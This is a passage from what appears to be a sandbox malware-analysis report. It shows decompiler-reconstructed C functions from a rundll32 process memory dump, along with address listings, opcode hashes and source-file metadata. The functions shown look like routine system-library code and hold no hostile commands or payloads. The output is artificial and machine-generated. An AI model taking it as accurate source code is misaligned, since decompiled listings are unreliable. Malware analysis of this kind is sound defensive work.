									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                            0x045eef4b
                                                                                            0x045eef4d
                                                                                            0x045eef57
                                                                                            0x045ef0bd
                                                                                            0x045ef0c2
                                                                                            0x045ef0d2
                                                                                            0x045ef0d2
                                                                                            0x045ef0c2
                                                                                            0x045eef5d
                                                                                            0x045eef5f
                                                                                            0x045eef67
                                                                                            0x045eef6a
                                                                                            0x045eef6d
                                                                                            0x045eef74
                                                                                            0x045eef7f
                                                                                            0x045eef82
                                                                                            0x045eef82
                                                                                            0x045eef86
                                                                                            0x045eef88
                                                                                            0x045eef8c
                                                                                            0x045eef8f
                                                                                            0x045eef8f
                                                                                            0x045eef8f
                                                                                            0x00000000
                                                                                            0x045eef91
                                                                                            0x045eef93
                                                                                            0x045eefc4
                                                                                            0x045eefc4
                                                                                            0x045eefc4
                                                                                            0x045eefca
                                                                                            0x045eefd0
                                                                                            0x045ef0a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ef0af
                                                                                            0x0463bb06
                                                                                            0x0463bb0a
                                                                                            0x045ef0b5
                                                                                            0x045ef0b5
                                                                                            0x045ef0b5
                                                                                            0x045ef0b5
                                                                                            0x00000000
                                                                                            0x045eefd6
                                                                                            0x045eefd9
                                                                                            0x045ef0de
                                                                                            0x045ef0e2
                                                                                            0x045eefdf
                                                                                            0x045eefdf
                                                                                            0x045eefdf
                                                                                            0x045eefe5
                                                                                            0x0463bafc
                                                                                            0x0463bafc
                                                                                            0x045eefe5
                                                                                            0x045eefeb
                                                                                            0x045eefed
                                                                                            0x045ef00f
                                                                                            0x045ef011
                                                                                            0x045ef01a
                                                                                            0x045ef01d
                                                                                            0x045ef021
                                                                                            0x045ef028
                                                                                            0x045ef029
                                                                                            0x045ef029
                                                                                            0x045ef02c
                                                                                            0x00000000
                                                                                            0x045ef02c
                                                                                            0x045eeff3
                                                                                            0x045eeff9
                                                                                            0x045ef0ea
                                                                                            0x045ef0ed
                                                                                            0x045ef0ef
                                                                                            0x00000000
                                                                                            0x045ef0ef
                                                                                            0x045ef003
                                                                                            0x0463bb12
                                                                                            0x045ef045
                                                                                            0x045ef049
                                                                                            0x045ef051
                                                                                            0x045ef09e
                                                                                            0x045ef0a0
                                                                                            0x045ef0a0
                                                                                            0x045ef09e
                                                                                            0x045ef053
                                                                                            0x045ef064
                                                                                            0x045ef064
                                                                                            0x045ef06b
                                                                                            0x0463bb1a
                                                                                            0x0463bb1a
                                                                                            0x045ef071
                                                                                            0x045ef071
                                                                                            0x045ef07d
                                                                                            0x045ef082
                                                                                            0x045ef08f
                                                                                            0x045ef08f
                                                                                            0x045ef009
                                                                                            0x045ef00d
                                                                                            0x00000000
                                                                                            0x045ef00d
                                                                                            0x045eefd0
                                                                                            0x045eef97
                                                                                            0x045eefa5
                                                                                            0x045eefaa
                                                                                            0x00000000
                                                                                            0x045eefac
                                                                                            0x045eefac
                                                                                            0x045eefac
                                                                                            0x00000000
                                                                                            0x045eefb2
                                                                                            0x045ef036
                                                                                            0x045ef03a
                                                                                            0x045ef040
                                                                                            0x045ef090
                                                                                            0x00000000
                                                                                            0x045ef092
                                                                                            0x045ef042
                                                                                            0x00000000
                                                                                            0x045ef042
                                                                                            0x045eefb7
                                                                                            0x045eefb9
                                                                                            0x045eefbc
                                                                                            0x045eefb0
                                                                                            0x045eefb0
                                                                                            0x00000000
                                                                                            0x045eefbe
                                                                                            0x045eefbe
                                                                                            0x045eefc1
                                                                                            0x00000000
                                                                                            0x045eefc1
                                                                                            0x045eefbc
                                                                                            0x045eefaa
                                                                                            0x045eef91

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction ID: 473ef1ca650f30dd653ff7f5755842549d476ebc2be63b611c911c8d19a21763
                                                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                            • Instruction Fuzzy Hash: 31513131A04249EFDB28CF6AD0C17BEBBB1BF05314F1881A8C55653282EB75B989E741
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A740D Relevance: .1, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 84%
                                                                                            			E046A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0462D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0461F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0461F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L045F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                            0x046a740d
                                                                                            0x046a740d
                                                                                            0x046a7412
                                                                                            0x046a7413
                                                                                            0x046a7416
                                                                                            0x046a7418
                                                                                            0x046a741c
                                                                                            0x046a741f
                                                                                            0x046a7422
                                                                                            0x046a7422
                                                                                            0x046a7428
                                                                                            0x046a742a
                                                                                            0x046a742a
                                                                                            0x046a7451
                                                                                            0x046a7432
                                                                                            0x046a744f
                                                                                            0x046a744f
                                                                                            0x00000000
                                                                                            0x046a7434
                                                                                            0x046a7438
                                                                                            0x046a7443
                                                                                            0x046a7517
                                                                                            0x046a7517
                                                                                            0x046a751a
                                                                                            0x046a7535
                                                                                            0x046a7520
                                                                                            0x046a7527
                                                                                            0x046a752c
                                                                                            0x046a7531
                                                                                            0x046a7533
                                                                                            0x00000000
                                                                                            0x046a7533
                                                                                            0x00000000
                                                                                            0x046a7531
                                                                                            0x046a754b
                                                                                            0x046a754f
                                                                                            0x046a755c
                                                                                            0x046a755c
                                                                                            0x046a755f
                                                                                            0x046a7560
                                                                                            0x046a7561
                                                                                            0x046a7562
                                                                                            0x046a7563
                                                                                            0x046a7568
                                                                                            0x046a756a
                                                                                            0x046a756c
                                                                                            0x046a756d
                                                                                            0x046a756d
                                                                                            0x046a756f
                                                                                            0x046a7572
                                                                                            0x046a7574
                                                                                            0x046a7577
                                                                                            0x046a757c
                                                                                            0x046a757f
                                                                                            0x00000000
                                                                                            0x046a7551
                                                                                            0x046a7551
                                                                                            0x046a7551
                                                                                            0x046a7553
                                                                                            0x046a7553
                                                                                            0x046a7449
                                                                                            0x046a7449
                                                                                            0x046a744c
                                                                                            0x046a744c
                                                                                            0x00000000
                                                                                            0x046a744c
                                                                                            0x046a7443
                                                                                            0x046a750e
                                                                                            0x046a7514
                                                                                            0x046a7514
                                                                                            0x046a7455
                                                                                            0x046a7469
                                                                                            0x046a746d
                                                                                            0x00000000
                                                                                            0x046a7473
                                                                                            0x046a7473
                                                                                            0x046a7476
                                                                                            0x046a7480
                                                                                            0x046a7484
                                                                                            0x046a748e
                                                                                            0x046a7493
                                                                                            0x046a7493
                                                                                            0x046a7496
                                                                                            0x046a7499
                                                                                            0x046a74a1
                                                                                            0x046a74b1
                                                                                            0x046a74b5
                                                                                            0x00000000
                                                                                            0x046a74bb
                                                                                            0x046a74c1
                                                                                            0x046a74c1
                                                                                            0x046a74c4
                                                                                            0x046a74c5
                                                                                            0x046a74c6
                                                                                            0x046a74c7
                                                                                            0x046a74c8
                                                                                            0x046a74cd
                                                                                            0x00000000
                                                                                            0x046a74d3
                                                                                            0x046a74d3
                                                                                            0x046a74d6
                                                                                            0x046a74d8
                                                                                            0x046a74db
                                                                                            0x046a74dd
                                                                                            0x046a74e0
                                                                                            0x046a74e7
                                                                                            0x046a74ee
                                                                                            0x046a74ee
                                                                                            0x046a74f4
                                                                                            0x046a74f9
                                                                                            0x00000000
                                                                                            0x046a74fb
                                                                                            0x046a74fb
                                                                                            0x046a74fd
                                                                                            0x046a7500
                                                                                            0x046a7503
                                                                                            0x046a7505
                                                                                            0x046a7505
                                                                                            0x046a74f9
                                                                                            0x00000000
                                                                                            0x046a74cd
                                                                                            0x046a74b5
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction ID: 206bb8f698d2ae92eef0a3816ed3a50598856b0224e7ab9819a910ee9a0de3e2
                                                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                            • Instruction Fuzzy Hash: D9517C71600A06EFDB15CF14D880A56BBB5FF55309F1881AAE9089F212E771FE56CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04602990 Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 97%
                                                                                            			E04602990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x46aff00);
				E0462D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x45b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0461E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x45b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E046551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x45b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E045E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04602C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04602AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04602C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04602ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0462D0D1(_t62);
				goto L28;
			}





















                                                                                            0x04602990
                                                                                            0x04602992
                                                                                            0x04602997
                                                                                            0x046029a3
                                                                                            0x046029a6
                                                                                            0x046029ab
                                                                                            0x046029ad
                                                                                            0x046029b2
                                                                                            0x04645c80
                                                                                            0x046029b8
                                                                                            0x046029b8
                                                                                            0x046029bb
                                                                                            0x046029c0
                                                                                            0x046029c5
                                                                                            0x046029c6
                                                                                            0x046029c6
                                                                                            0x046029cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046029cd
                                                                                            0x046029d0
                                                                                            0x046029d9
                                                                                            0x046029db
                                                                                            0x046029dd
                                                                                            0x04602a7f
                                                                                            0x04602a84
                                                                                            0x04602a87
                                                                                            0x04602a89
                                                                                            0x04645ca1
                                                                                            0x04645ca3
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029dd
                                                                                            0x00000000
                                                                                            0x046029db
                                                                                            0x046029e6
                                                                                            0x046029e9
                                                                                            0x046029eb
                                                                                            0x046029ed
                                                                                            0x046029f3
                                                                                            0x046029f5
                                                                                            0x046029f8
                                                                                            0x046029fa
                                                                                            0x04602a97
                                                                                            0x04602a9a
                                                                                            0x04602a9d
                                                                                            0x04602add
                                                                                            0x00000000
                                                                                            0x04602a9f
                                                                                            0x04602aa2
                                                                                            0x04602aa5
                                                                                            0x04602aa8
                                                                                            0x04602aab
                                                                                            0x04645cab
                                                                                            0x04645caf
                                                                                            0x04645cc5
                                                                                            0x04645cda
                                                                                            0x04645cdc
                                                                                            0x04645cdf
                                                                                            0x04645ce5
                                                                                            0x00000000
                                                                                            0x04645ceb
                                                                                            0x04645ced
                                                                                            0x04645cee
                                                                                            0x00000000
                                                                                            0x04645cee
                                                                                            0x04645cb1
                                                                                            0x04645cb4
                                                                                            0x04645cb9
                                                                                            0x04645cbb
                                                                                            0x00000000
                                                                                            0x04645cbd
                                                                                            0x04645cbd
                                                                                            0x00000000
                                                                                            0x04645cbd
                                                                                            0x04645cbb
                                                                                            0x04602ab1
                                                                                            0x04602ab1
                                                                                            0x04602ac4
                                                                                            0x04602ac6
                                                                                            0x04602ac6
                                                                                            0x00000000
                                                                                            0x04602ac6
                                                                                            0x04602aab
                                                                                            0x00000000
                                                                                            0x04602a00
                                                                                            0x04602a09
                                                                                            0x04602a0e
                                                                                            0x04602a21
                                                                                            0x04602a24
                                                                                            0x04602a35
                                                                                            0x04602a3a
                                                                                            0x04602a3d
                                                                                            0x04602a42
                                                                                            0x04602a59
                                                                                            0x04602a59
                                                                                            0x04602a5c
                                                                                            0x04602a5f
                                                                                            0x04602a5f
                                                                                            0x046029fa
                                                                                            0x046029f3
                                                                                            0x04602a64
                                                                                            0x04602a64
                                                                                            0x04602a6b
                                                                                            0x04602a6b
                                                                                            0x04602a6d
                                                                                            0x04602a72
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aafe461a2e59990e14779fefaaa125cd72c7319e1472c018084e6319d22a6f4b
                                                                                            • Instruction ID: 92bdddf4af2d9d5a0a504b181b97f323f12e0d1e099affd9e9f5b15ea236cac4
                                                                                            • Opcode Fuzzy Hash: aafe461a2e59990e14779fefaaa125cd72c7319e1472c018084e6319d22a6f4b
                                                                                            • Instruction Fuzzy Hash: 0B516871A00219EFDF29DF55C894ADEBBB5BF58314F108099E805AB3A0E731AD52DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04604D3B Relevance: .1, Instructions: 131COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E04604D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x46cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0461FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x46c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0461B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L045F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E045DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0461B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0461F380(_t67 + 0xc, 0x45b5138, 0x10) == 0) {
								 *0x46c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04604F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04604E70(0x46c86b0, 0x4605690, 0, 0) != 0) {
					_t46 = E045DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                            0x04604d3b
                                                                                            0x04604d4d
                                                                                            0x04604d53
                                                                                            0x04604d58
                                                                                            0x04604d65
                                                                                            0x04604d6c
                                                                                            0x04604d71
                                                                                            0x04604d77
                                                                                            0x04604d7f
                                                                                            0x04604d8c
                                                                                            0x04604d8e
                                                                                            0x04604dad
                                                                                            0x04604db0
                                                                                            0x04604db7
                                                                                            0x04604db8
                                                                                            0x04604db9
                                                                                            0x04604dba
                                                                                            0x04604dbb
                                                                                            0x04604dc1
                                                                                            0x04604dc8
                                                                                            0x04604dcc
                                                                                            0x04604dd5
                                                                                            0x04604dde
                                                                                            0x04604ddf
                                                                                            0x04604de0
                                                                                            0x04604de1
                                                                                            0x04604de6
                                                                                            0x04604de7
                                                                                            0x04604de9
                                                                                            0x04604df3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04646c7c
                                                                                            0x04646c8a
                                                                                            0x04646c8a
                                                                                            0x04646c9d
                                                                                            0x04646ca7
                                                                                            0x04646cac
                                                                                            0x04646cb2
                                                                                            0x04646cb9
                                                                                            0x00000000
                                                                                            0x04646cbf
                                                                                            0x04646cbf
                                                                                            0x00000000
                                                                                            0x04646cbf
                                                                                            0x04646cb9
                                                                                            0x04604dfb
                                                                                            0x04646ccf
                                                                                            0x04646cd3
                                                                                            0x04604e32
                                                                                            0x04604e39
                                                                                            0x04646ce0
                                                                                            0x04646cf2
                                                                                            0x04646cf2
                                                                                            0x04646ce0
                                                                                            0x04604e3f
                                                                                            0x04604e41
                                                                                            0x04604e51
                                                                                            0x04604e51
                                                                                            0x04604e03
                                                                                            0x04604e03
                                                                                            0x04604e09
                                                                                            0x04604e0f
                                                                                            0x04604e57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04604e1b
                                                                                            0x04604e30
                                                                                            0x04604e5b
                                                                                            0x04604e5b
                                                                                            0x00000000
                                                                                            0x04604e30
                                                                                            0x04604e11
                                                                                            0x04604e11
                                                                                            0x04604e16
                                                                                            0x00000000
                                                                                            0x04604e16
                                                                                            0x04604e01
                                                                                            0x00000000
                                                                                            0x04604e01
                                                                                            0x04604da5
                                                                                            0x04646c6b
                                                                                            0x00000000
                                                                                            0x04604dab
                                                                                            0x04604dab
                                                                                            0x00000000
                                                                                            0x04604dab

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68f8833f00f1eb7105e76d524f309e9be568c08831a1f775b6beec58f4124ed5
